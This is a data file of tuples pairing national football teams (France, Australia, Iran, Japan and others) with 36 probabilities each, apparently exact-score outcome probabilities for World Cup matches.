('IRN', 'JPN',0.00409058184101808,0.00259549837917446,0.00107614546597184,0.000301752961500396,6.38278545405605e-05,0.0114729874132128,0.00979235364949021,0.00417895472831483,0.00118893191200695,0.0377734380164612,0.0322401524809749,0.0137587083222812,0.0932733930706817,0.0796101327527085,0.153545742048095,0.126382744987277,0.131053417331981,0.0339741754226802,0.00391441603363625,0.000253692463179395,1.0832342379264e-05,0.107869423153337,0.0559279533424338,0.0460340232861889,0.00966580974674378,0.0159117609127269,0.0130968921372095,0.000835252074112295,0.00206247562077424,0.00339522707625642,0.00279459470532246,4.48405391029908e-05,0.000148926745335182,0.000373123597741835,0.000632212497658689,0.000654935726345697),
('FRA', 'AUS',0.0604081084484115,0.0253124359438197,0.00908822291267849,0.00223062401803567,0.000414840199747848,0.0594940843294144,0.0449480438452264,0.0169792229621183,0.00427595934823524,0.0985482182887589,0.0744536147827064,0.0281250176333424,0.12242920582804,0.0924958064910374,0.101398149386223,0.0419899182936465,0.0766067503317037,0.0349404954502612,0.00708285840505671,0.000807626549896575,6.20389103276305e-05,0.0317235689866255,0.0289383693484909,0.0119836483392427,0.00879923294993212,0.00728768867777013,0.00301789977412228,0.00133778271288822,0.00166196485287516,0.00137647025713118,0.000570009156778807,0.00012978749390188,0.000218338538001738,0.000278313970070771,0.000242516889384593,0.000131625820819658),
('FRA', 'PER',0.0110388696017115,0.00660274951618413,0.00279651774693728,0.000804695139998586,0.000175001183743374,0.0214533493902763,0.0188797443047207,0.00830743811903772,0.00243695136924727,0.0550655644769775,0.0484597420387724,0.0213231864666182,0.106004999592599,0.0932883369828206,0.136044610884721,0.0872984114990149,0.1197243106805,0.0410486007757501,0.00625506536575432,0.000536151930141976,3.05644594859397e-05,0.0768258446420826,0.0526809201581194,0.0338047984128326,0.0120414311166408,0.0154537221551289,0.00991649273805518,0.00137617246340426,0.00264922665931276,0.00339996237344261,0.00218172048438924,9.88250373683778e-05,0.000256615792613404,0.000503611434709625,0.00067147341940365,0.000558590602233991),
('FRA', 'DEN',0.0145606861752034,0.00855306855669996,0.0036592218936584,0.00106539694291179,0.00023460289581484,0.0252225013065086,0.0224989603756435,0.0100347545200474,0.0029837318879445,0.0601861657145346,0.0536872271753555,0.0239450239731933,0.107712588634578,0.0960817182323628,0.128512387219688,0.0766643615117849,0.114635541998723,0.0428533781218567,0.00711980860554974,0.000665386678967922,4.15025565509021e-05,0.0683860974340622,0.0511285634546509,0.0305008626566475,0.0127420148198826,0.0152025567600747,0.00906912035931151,0.00158775184260862,0.00284153109018199,0.00339024387388106,0.0020224578158059,0.000124840700874079,0.000301687353748481,0.00055138790419742,0.00068582493629043,0.000536377017998272),
('FRA', 'ARG',0.00410045246552514,0.00346734777875778,0.0019919574155783,0.000779464584424111,0.000230764107575279,0.00975402342900664,0.0117043083981855,0.00702227322278363,0.00280878456820048,0.0300294107501644,0.0360336928646791,0.0216192557401234,0.0693379647305648,0.0832018631917196,0.106734325513435,0.0821499180649169,0.12807550356774,0.0499189013224821,0.00864731832162568,0.000842597955847606,5.48957601092206e-05,0.0985755245428374,0.0768418900631245,0.0591426885612766,0.0199666739313413,0.030735391254843,0.023656025005383,0.00259408030927536,0.00598973621191694,0.00922020796351036,0.00709649238986877,0.000213124436215502,0.000664854114773559,0.00156918811443279,0.00252265204241865,0.00270470480976206),
('FRA', 'ICE',0.045251539061996,0.0209486668078579,0.00800631178023406,0.00209107046423333,0.000413763924712155,0.0499995129375543,0.0401829556485667,0.0161468565370955,0.0043255649370306,0.0892810248566961,0.0717522081976243,0.0288324388608824,0.119567685730519,0.0960925963161235,0.10675229511832,0.0476552357913543,0.0857932905362413,0.0386132215002662,0.00772389265360657,0.000869078386007364,6.58317458373243e-05,0.0382989376040039,0.0344746157114367,0.0153897950271132,0.0103440565439861,0.0092353696582616,0.00412275650089744,0.00155185929671851,0.00207829407184617,0.00185554032216037,0.000828330777103293,0.000148443822381287,0.000269145845177026,0.000369709845884415,0.000347051889843464,0.000204420531797073),
('FRA', 'CRO',0.00976822263967451,0.00625440664439337,0.00282760136708725,0.000869304751754944,0.000202063138306603,0.0192576450209888,0.0181242805947823,0.00852880886319128,0.00267562180815758,0.0503817864465125,0.0474166822281631,0.0223130412010452,0.0988564958011023,0.0930385240024587,0.129314016715788,0.0845777244259987,0.121703537542669,0.0437814777795288,0.00699995281890941,0.000629538559409961,3.77269643454707e-05,0.0796000968910924,0.0572704778127564,0.0374577080908292,0.0137349398514298,0.0179666518334988,0.0117510735976234,0.00164699667199543,0.00323165038545027,0.0042273164608677,0.0027648727939104,0.000124381299071968,0.000329388204278674,0.000659511186739248,0.000897962277022374,0.000773616203182881),
('FRA', 'NGA',0.0247020998229956,0.0111746145885597,0.00378702036842353,0.000871151965938656,0.000151399832881924,0.0383448261524236,0.0269516802115343,0.00947185238677756,0.00221918106608455,0.0825587653892004,0.0580286225469867,0.0203934798372187,0.133315568745085,0.0937043908284678,0.14351830308217,0.0772509299306612,0.100875653831285,0.032931310810831,0.00477803311097943,0.000389952598734251,2.11271949129252e-05,0.0542978693203235,0.035451567212522,0.0190823503055124,0.00771554902341595,0.00830602542232168,0.00447084569788073,0.000839591891324174,0.00135576967482469,0.00145952768257067,0.000785613181850214,5.72797208745901e-05,0.000124693815882551,0.000205080389006977,0.000228946781189495,0.000154064680986263),
('FRA', 'BRA',0.00111022752523338,0.00121613401308766,0.000854732033946004,0.000408721731233748,0.000147802094834766,0.00363553763445161,0.00532484325492426,0.00389955469320692,0.00190384656440351,0.0144178303814672,0.0211172856883321,0.0154648703391548,0.0428837190967729,0.0628102650388221,0.0850342164257395,0.0843072629361061,0.124546606114468,0.0459979856847811,0.00755028268110596,0.000697124164030552,4.29369007258406e-05,0.123481863076399,0.0912095021665713,0.0904297564515554,0.0224572070159719,0.0445304428331984,0.0441497541860492,0.00276465793025156,0.00822306900155864,0.0163055407480958,0.0161661454523499,0.000214629813784785,0.000861879692116237,0.00261732925101992,0.00540778320070691,0.00780520123559698),
('FRA', 'SWI',0.0107187653912447,0.00680304638624198,0.00307479779400304,0.000945497562785275,0.000219862793573578,0.0203855449537908,0.0191993872996573,0.00904112383352538,0.00283835169311539,0.0520951750006519,0.0490639540688339,0.0231045542014065,0.0998467516259804,0.0940370473011764,0.127578978413202,0.0815068866432759,0.120155640842664,0.044282693833891,0.00725339589897726,0.000668299689464849,4.10711109079252e-05,0.0767643096027472,0.0565821195853744,0.0361488425792581,0.0139020171975816,0.0177632734472328,0.0113484927790212,0.00170783706564972,0.00327327786708533,0.00418242396016647,0.00267204174116614,0.000132291508882788,0.000342311011621371,0.000669818664814103,0.000891711453009143,0.000752424803892227),
('FRA', 'CRC',0.0243146061928303,0.00978431770538483,0.00290246156226004,0.000582884250400069,8.83406171046016e-05,0.0400623194960156,0.024515730160806,0.0075010762342059,0.0015300691787763,0.0881569597980592,0.0539467575865443,0.0165060856270899,0.145491754944622,0.0890322040689435,0.160076986966241,0.0880621783892272,0.0979574889019975,0.0272411772213178,0.00336691057279014,0.000234077579544392,1.07444649662747e-05,0.0538887570645471,0.0299720459943708,0.016488339211451,0.00555665405316785,0.00611369653753522,0.00336329065975966,0.000515086695656108,0.000850084525048283,0.000935303649943271,0.000514532903388353,2.97392282570012e-05,6.60573050704267e-05,0.000110732288012449,0.000125663053461655,8.38319600766803e-05),
('FRA', 'SRB',0.0233875359231976,0.0129553214078786,0.00550385639522196,0.00159549396511087,0.000350187271000541,0.0332470460172006,0.0296099634201687,0.0131853809401614,0.0039143191560255,0.0700786695967489,0.0624123671685087,0.0277923624834157,0.110784727985523,0.0986653593665907,0.116756934508506,0.0615255460012728,0.103984232405469,0.0439358985482666,0.00825066620022182,0.000871527405508582,6.17827309321199e-05,0.0547949181879525,0.0463044042500397,0.0244002959288024,0.0130431672854321,0.0137463011032323,0.00724366980372077,0.00183701977804434,0.00290407534255058,0.00306062884969357,0.00161281093818822,0.000164345552113986,0.000351406963840819,0.000568905183324632,0.000628461369577337,0.000440233581022565),
('FRA', 'GER',0.00277883058709938,0.00284483286477739,0.00198171602850091,0.000943722492080881,0.000340534288552581,0.00667511323454067,0.00978515701424328,0.00717211037693979,0.00350457106848209,0.021422342668798,0.031403360401801,0.0230173482838032,0.0515628067975747,0.0755867567906627,0.0827398785137375,0.0663839686166004,0.121289733094999,0.0554019278329853,0.011247168354792,0.00128435192661685,9.88119806667558e-05,0.0973133388630421,0.0889002958338503,0.071326602777897,0.0270715289109169,0.0434401296667923,0.0348529422124133,0.0041218517368283,0.00992114858959307,0.0159198980816203,0.0127728736567373,0.000400514591170209,0.00130544715281842,0.00322414010879188,0.00544360664450003,0.00651647322091623),
('FRA', 'MEX',0.0134733986585351,0.00819753724936726,0.00361976726158796,0.00108816615940652,0.0002474433369412,0.0236869468717433,0.0218244603180699,0.0100542098302927,0.00308788499504105,0.0573375851773472,0.0528291746172549,0.0243376284692492,0.104095264739187,0.0959103335225304,0.125988611805046,0.0762432870713819,0.116082223418504,0.0441844886001819,0.00747465977273028,0.000711271738670441,4.52074126538363e-05,0.0702483356009707,0.0534773833949164,0.0323623812945422,0.013570098661656,0.0164241658515706,0.00993925065121746,0.00172173324494204,0.00312577304028681,0.00378318655656508,0.00228943373963925,0.00013796868087226,0.000338302114421488,0.00062747278248139,0.000792323234491626,0.000633179153090913),
('FRA', 'SWE',0.0120916586649626,0.00798662962211333,0.00383282931515285,0.00125427638084032,0.000310687083125754,0.0211997917608886,0.0212988916544289,0.0106992273986395,0.00358308055915494,0.0519221100017527,0.0521648234977906,0.0262043357874304,0.0953749524090055,0.0958207892236661,0.116795222006104,0.0715131359906556,0.117341189353206,0.0481343550666836,0.00877560992277342,0.000899957479291449,6.18519552123375e-05,0.0718474290933115,0.058944854431226,0.0360916424361039,0.0161197874800592,0.0197401320773499,0.0120867851053637,0.00220415802965,0.00404878513551741,0.00495810217267399,0.00303582140467587,0.0001911214156853,0.000474641334123119,0.00089223231252018,0.00114368959051576,0.000946783236200995),
('FRA', 'KOR',0.0402014604771421,0.0173234378398831,0.00596506871898581,0.00139851648959224,0.000248032064545096,0.0497235647654473,0.0357346889318184,0.012840672215251,0.00307605612115656,0.0933298138329939,0.0670730644739316,0.0241016015845398,0.131383191116572,0.0944207738839115,0.123301384620508,0.0578583581359549,0.0886126456351365,0.0339285507722466,0.00577367585131144,0.00055266506506956,3.53437476844121e-05,0.041580897102752,0.0318414954974978,0.0149414108831687,0.00812777746643075,0.00762781149537682,0.00357930002693305,0.00103733768643201,0.00146029151791513,0.00137046424720162,0.000643081271724219,8.36437951266723e-05,0.000159044770646074,0.000228766883267643,0.000224046254311375,0.000134018195878934),
('FRA', 'BEL',0.00864963366544215,0.00738867841123384,0.0046454757626391,0.00200497343399796,0.000656828439839873,0.0144736957441123,0.0193135993300774,0.0128859665726532,0.00573164817438405,0.0362293279326752,0.0483441642038321,0.032255058897452,0.0680146362922157,0.0907582594765511,0.0851242352339307,0.0532689419453008,0.1135891897725,0.0605535963452305,0.0143469757120568,0.0019120679040468,0.000173184566057943,0.0710817070952458,0.0757863139546308,0.047425468754031,0.0269340998199616,0.033709577436217,0.0210947389837425,0.0047861262492984,0.00898516905142657,0.0112454566494213,0.00703716838994455,0.000548474669337353,0.00139803445449895,0.00270485554825301,0.00359240480650228,0.00334172391719618),
('FRA', 'TUN',0.0383864071010752,0.0162149581983743,0.00541627889590366,0.00123059503083619,0.000211414475424831,0.0492323996322326,0.034251561401472,0.0119146077298935,0.00276304439951044,0.0940319762586159,0.0654191555273108,0.0227564392464544,0.134698074212576,0.0937110397627569,0.128634052078033,0.0614215141929219,0.0894922280039812,0.0325979381099314,0.00527730777530831,0.000480570648657073,2.91760431322876e-05,0.0427316722415638,0.0311303995471518,0.0148644643212887,0.0075595900739771,0.00721926210860228,0.00344712774652352,0.000917871323816687,0.00131482400575121,0.00125563146034538,0.000599551862953821,7.02309685890617e-05,0.000135801020443334,0.000198555916910962,0.000197465662209745,0.000119056665526611),
('FRA', 'PAN',0.0736875900411811,0.0227337232134537,0.00596369775101267,0.00106243207167203,0.00014302373469162,0.0757341942288117,0.0412455758691424,0.0112313700970888,0.00203890432043734,0.123025641495825,0.0670009561973467,0.0182446849159942,0.149885813993066,0.0816292663533391,0.121740242999811,0.0494399248695367,0.0663009157238291,0.0222280446290021,0.00331207738492035,0.000277601761314203,1.54612134285192e-05,0.0269254620444012,0.0180540605041552,0.0073319337379414,0.00403520281472103,0.00327747208445214,0.00133101404781629,0.000450947357581552,0.000549402636209193,0.000446235762111137,0.000181220786235076,3.16327620595737e-05,5.19707725704012e-05,6.45212281522437e-05,5.43984555027506e-05,2.69388777040789e-05),
('FRA', 'ENG',0.00253585065621218,0.00210342961757554,0.00113714497769531,0.00041713823671178,0.000115588762779769,0.00738093706311562,0.0082698569986402,0.00463291680941996,0.00173029337480566,0.025848062718163,0.0289610628763253,0.0162244879253,0.067889992209207,0.076066293806324,0.118875473503797,0.104075562103507,0.133192189300021,0.0426136523598342,0.00605949235040888,0.00048467012565533,2.57160345769872e-05,0.116609857026174,0.0746165662590027,0.0653268571451053,0.015915269664366,0.0278676599558592,0.0243981562296179,0.00169731616709799,0.00445800455598063,0.00780597235659146,0.00683413438307562,0.000113385786859984,0.000401389499581294,0.00107335861584861,0.00194760103614603,0.00229397734946714),
('FRA', 'POL',0.0257829028862448,0.0164408012701612,0.0084018664942548,0.00294998567193325,0.000786478710806166,0.0310950795980956,0.0337863385688991,0.0183552621290314,0.00664796605366387,0.0615275356635841,0.0668527039682247,0.0363193810678517,0.0913079583754819,0.0992106029501181,0.0903350905983946,0.0446862942650758,0.0981535340979305,0.0538986081434988,0.0131542666474522,0.00180583580092678,0.000168790644566577,0.0485538640499822,0.0533243294056364,0.0263780847456243,0.0195211659064778,0.0193131718430963,0.00955369695713701,0.00357318997346784,0.00530267753854138,0.00524617858487606,0.00259514080805136,0.000422721449103926,0.000852225517217651,0.00130460102935573,0.00137212043978402,0.000968542591557367),
('FRA', 'SEN',0.0266495696169442,0.0120060832603646,0.00409111343228845,0.000946743185760804,0.000165557313931143,0.0399407154189586,0.0282563916481091,0.00999510975950547,0.00235704120442774,0.0841763108019208,0.0595512318836187,0.0210650073938355,0.133053161903146,0.0941295671176182,0.140206856487869,0.0738725871863144,0.0991905079094034,0.0332963729648153,0.00496753828557276,0.000416877105883207,2.32485117753207e-05,0.0522617768284834,0.0350865753137283,0.018486514560412,0.00785193208723168,0.00827409660589926,0.00435947954485497,0.000878581579296734,0.00138872868152143,0.0014633946323831,0.000771037524673826,6.17111003679137e-05,0.00013154126845387,0.000211878201287671,0.000231772030645833,0.000153210853097879),
('FRA', 'COL',0.00388807683159307,0.00296532627933663,0.00150542862832931,0.00051883081847128,0.000135097026198252,0.0101076823113594,0.0106450668471088,0.00560551097119792,0.00196784442969494,0.0324130045316042,0.0341362727206812,0.0179755800503548,0.0779557689687988,0.0821003615099804,0.124993080263844,0.100205990656682,0.131638456161146,0.0432326526261789,0.00631042294884079,0.000518116687226893,2.82462304933248e-05,0.105533537379025,0.0693185698916741,0.0555721640929023,0.0151770525628249,0.0243346525119011,0.019508903669658,0.00166148064548009,0.00399598874639611,0.00640710685968113,0.00513652826830356,0.000114064450879944,0.000369857827867502,0.000906095023156076,0.00150692134847158,0.0016092678368194),
('FRA', 'JPN',0.0466072615118034,0.0232106580767929,0.00973654770215872,0.00280017609728906,0.000610940833855125,0.0479459794125773,0.0425747821683701,0.0189026493867876,0.00559502027008647,0.0835455820319157,0.0741863029959389,0.0329377533697879,0.109183257322624,0.096951891564122,0.0951255860545233,0.0414389410249875,0.084469045257369,0.0430453785147952,0.00974928931834732,0.00124205810448029,0.000107252931534094,0.036796701392734,0.0375031571558564,0.0163372566949717,0.0127410586947756,0.011100609241894,0.00483568628373672,0.00216427880976904,0.00282843214994474,0.00246426304249119,0.00107349089896086,0.000236325560392445,0.000418994604249238,0.000563559305341732,0.000519677155615541,0.000308369492227007),
('AUS', 'PER',0.000678628942816876,0.000867446077242913,0.000707618760218108,0.000393469452194909,0.000165581302473908,0.00234735345875852,0.00400563447874283,0.00341770164979315,0.00194404234484966,0.00993160967134933,0.0169477664220253,0.0144602333458653,0.031515344534928,0.0537792679698662,0.0666704239643008,0.0705203369528984,0.113769550958486,0.0458857376629547,0.00822520770426835,0.000829351350518846,5.59986567708631e-05,0.120339223774374,0.0970708595780504,0.102676259107293,0.0261005278347939,0.0552154286147555,0.0584038678529514,0.00350897043776096,0.0111347924423503,0.0235555518697643,0.0249157775846262,0.00029887203690094,0.0012819143188993,0.00416122601769877,0.00920743037082779,0.0149985626902867),
('AUS', 'DEN',0.000921214423590721,0.00116603740436245,0.000960237658220034,0.000540083819368567,0.000230085837793441,0.00285842941497611,0.0049441722721519,0.00427592147783016,0.00246532732250604,0.0112432575493567,0.0194472537726304,0.0168187768374446,0.0331679102321537,0.0573699183320251,0.0652308143696395,0.0641442151999288,0.112828528144346,0.0496158411305721,0.00969704197877948,0.00106605772088085,7.88072052674449e-05,0.110949057740886,0.0975787048363499,0.0959532623107393,0.0286065329783347,0.0562600245058478,0.0553228585896054,0.00419319835415415,0.0123700472025705,0.024327979880756,0.023922730260701,0.000391345825579423,0.00156243803202952,0.00472488439804177,0.00975878506997667,0.0149942263375443),
('AUS', 'ARG',0.00017319532149553,0.000305505917673922,0.000337726816141672,0.000255252677933083,0.000146185956277382,0.000713729257372774,0.00166068509047354,0.0019320175971718,0.00149845467078374,0.00362203530513583,0.008427649513135,0.00980460850499373,0.0137858364528257,0.0320764951421307,0.0349802014049172,0.0443794068831334,0.0813909452846868,0.0373173417559381,0.00760436210882369,0.00087164050822331,6.73258434462599e-05,0.103260751291278,0.0946890770818102,0.12013210074346,0.0289429791619264,0.073439957292906,0.0931733270616237,0.004423403778896,0.0168359267437855,0.0427195049318414,0.0541982668787525,0.000431537586039012,0.00222431482670098,0.00868769309156936,0.0231991207983805,0.0521336281425246),
('AUS', 'ICE',0.00372526722097063,0.00389144810907395,0.00285848302752435,0.00144108376478681,0.00055140634357162,0.00768509420026012,0.0119761471686368,0.00933157728892854,0.00484732045418235,0.0226203203855895,0.0352506135748299,0.0274665817331569,0.0499355194302041,0.0778175405602974,0.0734901498080412,0.0540777604842695,0.114524145913069,0.0606338903445023,0.0142676119287536,0.00188846817033376,0.000169804774796907,0.0842726453617163,0.0892349521083894,0.0656635804872823,0.0314964863691659,0.046353407917028,0.0341091765020787,0.00555852068143704,0.0122707199880298,0.018058829876262,0.0132885982573927,0.000632308838169322,0.00189497818101715,0.00431030597498248,0.00672885578412613,0.00766897068008052),
('AUS', 'CRO',0.000563019514773326,0.000767707349973009,0.000668263263918553,0.000396939292775522,0.000178518869715739,0.0019666785981144,0.0035890773366875,0.00327493168967067,0.00199218844025762,0.00848125148085674,0.0154778048156294,0.0141230596953435,0.0274313861262718,0.0500607299810557,0.0591485778175592,0.0637691847166483,0.107942812997424,0.0456790020507938,0.00859126202689161,0.000908907839363637,6.45370294811472e-05,0.116375159553269,0.0984947678178825,0.106189045863032,0.0277871993895686,0.0599157956459166,0.0645963365640745,0.00391964196181117,0.0126775172713447,0.0273357355478084,0.0294711662364966,0.000351236880293525,0.00153658311582771,0.00508973926865912,0.0115042849165732,0.0196581354497013),
('AUS', 'NGA',0.00196180386646746,0.00194859127446227,0.00127230188464763,0.000565662418026015,0.000190249593369377,0.00557433008670686,0.00759737526772903,0.00517731369159016,0.00235209100656848,0.0197835972497518,0.0269634933909647,0.0183745647130408,0.052659787909816,0.0717711660498822,0.0934462095947219,0.0829114057824849,0.127359863982755,0.0489092387248257,0.00834769747124973,0.000801428950330969,5.14115064965072e-05,0.113001751583862,0.0867907592188843,0.0770062679586022,0.0222198204311318,0.0394296688152363,0.0349845037609069,0.00284431444335331,0.00757096868910889,0.0134348875116846,0.0119202845674999,0.000230063235117793,0.000827188134734255,0.00224988658566745,0.00416691551021151,0.00530102906687248),
('AUS', 'BRA',3.33011698090316e-05,7.4448291665113e-05,0.000100725907864015,9.30505139768195e-05,6.51014478719589e-05,0.000185058727124051,0.00052558090543676,0.000746344937233236,0.00070655885652313,0.00120975381768488,0.00343579314921033,0.00487895735131937,0.00593124270122418,0.0168451818388706,0.0193866660949518,0.031683311677634,0.0550596109566599,0.0239208008741617,0.00461887038445341,0.000501670266145917,3.66170595716743e-05,0.0899830226736806,0.0781867481456273,0.127779325151921,0.0226456332314926,0.0740187768538082,0.120967677762146,0.00327948608055751,0.0160788315727719,0.0525547435167273,0.0858893587387967,0.000302167738963499,0.00200462744148767,0.0100719493393387,0.0345529018257493,0.110911747204389),
('AUS', 'SWI',0.000625032783115888,0.000846988519536883,0.000736945239586095,0.000437786523483652,0.000196958551176457,0.00211049638608862,0.00385426420187406,0.00351939776721894,0.00214241681337139,0.00889029049206886,0.0162357673833058,0.0148251703788519,0.0280872069555576,0.0512938648049825,0.0591575116147294,0.0622990243562538,0.108035569637325,0.0468373478857287,0.00902475263710988,0.000978139607783688,7.12366809576482e-05,0.113772712889121,0.0986492162049905,0.103887904601279,0.0285120149074265,0.0600522456972774,0.0632412725827181,0.00412033174390384,0.0130174160810407,0.0274173912780444,0.0288733700994709,0.0003787939702399,0.00161926832594495,0.00524227580828523,0.0115875171148312,0.0194001432085536),
('AUS', 'CRC',0.00206547130646608,0.00182387119166349,0.00104339298883174,0.000405180913778066,0.000118875368793259,0.00624406668647638,0.00740914509469186,0.00439580755544227,0.00173867329428933,0.0226487485689287,0.0268747713287291,0.015944663162589,0.0616143898073931,0.0731109991173868,0.111745188916545,0.101331744784202,0.13259568801685,0.0433763785428348,0.00630659092273279,0.000515772947202663,2.80041952234739e-05,0.120239202670674,0.0786683375415497,0.0713372985418753,0.0171566543858456,0.0311156791703248,0.0282160340954746,0.00187083392705413,0.0050894772616508,0.00923038595151981,0.00837021372076816,0.000127911364233844,0.000469119501142695,0.00129986926466411,0.00244491169616103,0.00302585488855071),
('AUS', 'SRB',0.00159463741795171,0.00193519917835155,0.00158098593730335,0.000884906772455264,0.000375644288907219,0.00411614204785552,0.00710832023482256,0.00613781254064259,0.0035332063028071,0.0143014246128629,0.0246976670825455,0.0213256642548614,0.0372674357892897,0.064358533996409,0.0647423506354588,0.0562363881097679,0.111805995935387,0.0555715842858889,0.012276030077148,0.00152540665288332,0.000128288994653893,0.0971167299102961,0.0965409859574766,0.0838572634684479,0.0319895517426999,0.0555734176965361,0.0482720855127089,0.00529998430485071,0.0138109894721689,0.0239929553534446,0.0208407191878766,0.000563485023173799,0.00199117161648458,0.00533635567265491,0.00979823878275687,0.0134983664988624),
('AUS', 'GER',9.06276679868988e-05,0.000192022684846033,0.000257056320852904,0.000236275336980495,0.000164859925307273,0.000372653232639429,0.0010592680644714,0.00150548651418067,0.00142645015641746,0.00197137561837238,0.00560364181152812,0.00796418532806839,0.00782159153937904,0.0222329002014064,0.0206885295860547,0.0273611357917472,0.0588072147829284,0.0315985467201309,0.0075460745081091,0.00101367233926242,9.25863439062169e-05,0.0777741203171214,0.0835798526942331,0.110536599012943,0.0299396583675314,0.0791920039309825,0.104733551225251,0.00536243552883375,0.0212758948481978,0.056275884239242,0.0744263677157821,0.000619755773989959,0.00333909947214328,0.0136566675051253,0.0383508036436405,0.102192078369339),
('AUS', 'MEX',0.000823866843113954,0.00107748272881942,0.000915690800112851,0.00053173189004853,0.000233916879032074,0.00258705045855612,0.0046220128786362,0.00412883385780616,0.00245885208789473,0.0103226541067875,0.018442408057981,0.0164745622326645,0.0308915083553827,0.0551906318590961,0.0616304862811849,0.0614783324200076,0.110108753529002,0.0493016690859565,0.00981112661299067,0.00109824355950656,8.27404063665157e-05,0.109836916115252,0.0983599054240457,0.0981170736649871,0.0293607144640865,0.0585764569721754,0.0584318429241581,0.00438212882640123,0.0131139305700581,0.0261631095766663,0.0260985178724189,0.000416883107216877,0.00168887761729588,0.00518330852179858,0.0108697927256553,0.0171696637770442),
('AUS', 'SWE',0.000682090845075737,0.000965183733363841,0.000890952479230605,0.000563021606790642,0.000269750806786016,0.00212502616544218,0.00413982054845148,0.00403244780042862,0.00261857328884524,0.00857908919740597,0.016713154089107,0.0162796721877361,0.0259764230156195,0.0506053673710662,0.0524356014303892,0.0529228426814842,0.102151203501425,0.0492928376863264,0.0105716222135427,0.00127532823890336,0.000103958821574979,0.103100411269376,0.0995017515975512,0.100426340171192,0.0320095670136334,0.0646140115933968,0.0652144168712657,0.00514871529369894,0.0155896743090809,0.0314690728592236,0.0317614892712121,0.0005303919162023,0.00217667380044164,0.00677262411615917,0.0144260213311798,0.0240273195464751),
('AUS', 'KOR',0.00344047808314704,0.00332546721624843,0.00220371818493526,0.000997992769943981,0.000342412654954177,0.00793030936721696,0.0110512067524856,0.00770015172365476,0.00357682425670951,0.0245360380444584,0.0341919610900776,0.0238239401379114,0.0569350893239848,0.0793413490514808,0.0880773657767257,0.0681269007766281,0.122739370476095,0.0552826889713601,0.011066541288258,0.00124611230621114,9.44653812335375e-05,0.0949375908335845,0.0855211377634608,0.0661496857374817,0.0256795541159851,0.0397257211275512,0.0307274205770109,0.00385541818573392,0.00894637424299454,0.013839849659176,0.0107049757469391,0.000369082706386651,0.00115951180342247,0.00275980072165753,0.0044889857695014,0.0051012313852499),
('AUS', 'BEL',0.000359251074890335,0.000651033020734772,0.000785429020730979,0.000653772876290933,0.00041394191034588,0.00104986054095983,0.00271648440584885,0.00351441321933747,0.00303114821241278,0.00433180217797664,0.0112084154100482,0.0145007286624162,0.0134050019338529,0.0346850627230865,0.0276550143125472,0.028526658198227,0.0715565660319792,0.0448733085620176,0.0125067415299706,0.00196075253083329,0.000211173089549402,0.0738119198913957,0.0925752936596002,0.0954931257666983,0.0387028048621012,0.0798453165227924,0.082361919159866,0.00809020984422527,0.0250356027702474,0.0516493735958334,0.0532772831020518,0.00110482123714827,0.00465727761969535,0.0149336093508946,0.0330379790469691,0.066464877727379),
('AUS', 'TUN',0.00331213290759874,0.00313124100206459,0.00201364500346973,0.000883892652551537,0.000293800036432753,0.0079077534782016,0.010667786527722,0.00719557518546514,0.0032356791864387,0.0248962447504537,0.0335857491096396,0.022654070012609,0.0587862600025807,0.0793043528986329,0.0925393742371003,0.0728362017231421,0.12483827328351,0.0534919247150167,0.010186997000044,0.00109125603524034,7.85046565422095e-05,0.098258127749486,0.0842052078095871,0.0662765179981011,0.024054047519724,0.0378650811473126,0.0298029753436901,0.00343563787283514,0.00811240021503722,0.0127702704582245,0.0100512673964184,0.000311956307794433,0.000996513935274153,0.00241050861247897,0.00398001033809894,0.00453618128416473),
('AUS', 'PAN',0.00814899730902175,0.00583730730532919,0.00294975990326389,0.00101555612382964,0.000264558706944714,0.0162031668294682,0.0171110669558051,0.0090349193909909,0.00318038879408821,0.0433870074251168,0.045818079692484,0.0241926852218382,0.0871326157929027,0.0920148535504361,0.116656931578992,0.0780926841320312,0.123193483602021,0.0485853270721953,0.00851608538479712,0.000839648294896341,5.53811294834811e-05,0.0824683940494603,0.0650481467178182,0.0435446424507483,0.0171025576533199,0.0228976472223805,0.0153281824551784,0.00224831523297658,0.0045152131710027,0.00604516356086636,0.00404676380644849,0.000187024734820485,0.000507525544807892,0.00104211976532918,0.00145787574607715,0.00132578715424571),
('AUS', 'ENG',0.000108984732863686,0.000186941704706627,0.000194739506285415,0.00013807595135376,7.40467738226168e-05,0.000547090006421917,0.00118860377176976,0.0012911759579609,0.000935066500719572,0.0031581404613217,0.00686135301329332,0.00745346284460806,0.013673048844378,0.029705966545268,0.0394646294742921,0.0569535367447893,0.0857405671718017,0.0322694835084795,0.0053977797351165,0.000507879670878921,3.19026231910782e-05,0.123736840000469,0.0931396665428101,0.134414879640486,0.0233694817799694,0.0674515208677781,0.0973429301987342,0.00293179425552968,0.0126930915671647,0.0366361710020062,0.0528716356683487,0.000232165205326673,0.00135737556368728,0.00600242908744588,0.0180663393343842,0.0437799966017189),
('AUS', 'POL',0.0015417551394982,0.00216180332068035,0.0021192050810325,0.00143478122048524,0.000739226118880692,0.00336257518755148,0.00708456657084492,0.0074631912592683,0.00524136734081824,0.0109674588946085,0.0231071985957399,0.0243421302999113,0.0268288026057155,0.0565252603956352,0.0437527450477635,0.0356762604605912,0.0921820978444189,0.0595461733747612,0.0170953741271807,0.00276074242040355,0.000306938083440995,0.0751658559688314,0.0971086403118424,0.0791829893406026,0.0418190231972928,0.0681989832713542,0.0556098751673802,0.00900450616731805,0.0220269910146353,0.0359218909690514,0.029290933335721,0.00126996749391441,0.00423463796567562,0.0107453085662558,0.0188311735557346,0.0272777335792026),
('AUS', 'SEN',0.00213563778715125,0.00211894679263817,0.00139086723538035,0.000622022627779951,0.00021049046077484,0.00587339700540815,0.00805716103733966,0.00552643077948321,0.00252706356650768,0.0204041998773843,0.0279906030698715,0.0191988381049798,0.0531631914528632,0.0729295830675542,0.0923445480975526,0.0802013134491942,0.126678801766208,0.0500226184795838,0.00877902686748402,0.000866660217596314,5.72377738137533e-05,0.110020640060821,0.0868893678486014,0.0754634850653701,0.0228737754447891,0.0397317843231209,0.0345070862768005,0.00301078035238037,0.00784459539006611,0.0136260746675844,0.0118342566833789,0.000250781401807072,0.000882941636854395,0.00235220082038312,0.00426944751383443,0.00534186320440117),
